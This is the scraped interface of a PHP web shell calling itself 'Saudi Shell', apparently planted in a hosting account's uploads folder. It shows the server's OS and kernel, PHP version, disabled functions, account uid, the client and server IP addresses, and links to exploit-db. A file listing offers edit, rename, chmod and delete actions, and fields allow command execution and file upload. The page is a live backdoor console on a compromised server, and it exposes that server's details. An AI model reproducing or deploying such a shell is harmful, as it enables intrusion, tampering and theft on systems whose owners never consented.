Saudi Shell
OS : Linux cld21.cloud-servers.net 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64   [ Google ]   [ exploit-db ]
safe_mode: OFF
disable_functions : exec,passthru,shell_exec,system
Server : Apache
PHP version : 8.1.34
Id : user = w0323med | uid= 1087 | gid= 1089
Pwd : /home/w0323med/public_html/uploads/meetnvisit  drwxr-xr-x  [ Home ]


Your ip : 216.73.216.102    | ip server : 37.27.141.47 |  list site |  phpinfo |


NameSizeModifyOwner/GroupPermissionsOption
[ . ]dir2025-07-03 02:58:37root/rootdrwxr-xr-x   0755R - C - rm
[ .. ]dir2025-07-03 02:58:37root/rootdrwxr-xr-x   0755R - C - rm
bin-target.js0.322025-07-01 16:10:44root/root-rw-r--r--   0644E - R - C - D - rm
check-bin.js2.022025-07-01 16:10:44root/root-rw-r--r--   0644E - R - C - D - rm
check-bins.js0.482025-07-01 16:10:44root/root-rw-r--r--   0644E - R - C - D - rm
fix-bin.js1.132025-07-01 16:10:44root/root-rw-r--r--   0644E - R - C - D - rm
get-node-modules.js0.522025-07-01 16:10:44root/root-rw-r--r--   0644E - R - C - D - rm
get-paths.js1.222025-07-01 16:10:44root/root-rw-r--r--   0644E - R - C - D - rm
get-prefix.js0.142025-07-01 16:10:44root/root-rw-r--r--   0644E - R - C - D - rm
index.js1.332025-07-01 16:10:44root/root-rw-r--r--   0644E - R - C - D - rm
is-windows.js0.122025-07-01 16:10:44root/root-rw-r--r--   0644E - R - C - D - rm
link-bin.js0.332025-07-01 16:10:44root/root-rw-r--r--   0644E - R - C - D - rm
link-bins.js0.762025-07-01 16:10:44root/root-rw-r--r--   0644E - R - C - D - rm
link-gently.js2.552025-07-01 16:10:44root/root-rw-r--r--   0644E - R - C - D - rm
link-mans.js1.502025-07-01 16:10:44root/root-rw-r--r--   0644E - R - C - D - rm
man-target.js0.232025-07-01 16:10:44root/root-rw-r--r--   0644E - R - C - D - rm
shim-bin.js2.052025-07-01 16:10:44root/root-rw-r--r--   0644E - R - C - D - rm




Change dir :
Make dir :
read file :
Make file :
Execute :
Upload file :